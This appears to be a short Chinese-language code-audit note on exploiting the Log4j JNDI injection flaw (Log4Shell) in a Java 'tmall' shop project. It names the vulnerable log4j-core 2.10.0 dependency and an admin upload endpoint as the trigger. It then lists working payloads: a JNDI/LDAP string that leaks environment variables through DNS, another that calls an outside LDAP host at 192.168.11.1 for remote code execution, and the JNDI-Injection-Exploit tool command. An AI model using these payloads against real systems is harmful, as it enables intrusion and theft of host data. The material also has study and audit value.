Apache Log4j的某些功能存在递归解析功能,特别是与JNDI(Java Naming and Directory Interface)查找相关的功能。
攻击者可以通过构造特殊的日志消息,利用JNDI注入机制,触发远程代码执行RCE。这些特殊消息通常包含恶意的JNDI URL,当Log4j尝试解析这些URL时,会触发Java的反射机制,从而执行攻击者指定的代码。
logger:是一个日志记录器的实例,它提供了多种方法来记录不同级别的日志信息,包括 debug(), info(), warn(), error(), 和 fatal()。这些方法允许开发者根据日志消息的重要性来分类记录它们。
logger.error:是 logger 实例的一个特定方法,用于记录错误级别的日志消息。当程序遇到运行时错误或异常情况时,通常会使用这个方法来记录相关的错误信息。这些错误信息对于后续的调试、问题追踪和错误处理非常有用。
log4j-core 是源码,log4j-api 是接口,该组件漏洞主要发生在引入的 log4j-core中,pom.xml文件引入了Log4j组件log4j-core,版本为2.10.0,初步判定可能存在漏洞。
SprinBoot默认自带日志记录框架,一般不需要引入,可以删除
漏洞触发点
全局搜索logger.info("
AccountController.java
/tmall/admin/uploadAdminHeadImage
src/main/java/com/xq/tmall/controller/admin/AccountController.java#uploadAdminHeadImage
出网外带信息
${jndi:ldap://${env:OS}.dns}
${env:OS}
${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}
命令执行
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc
${jndi:ldap://192.168.11.1:1389/vettrc}
mybatis
Mybatis版本为3.5.1
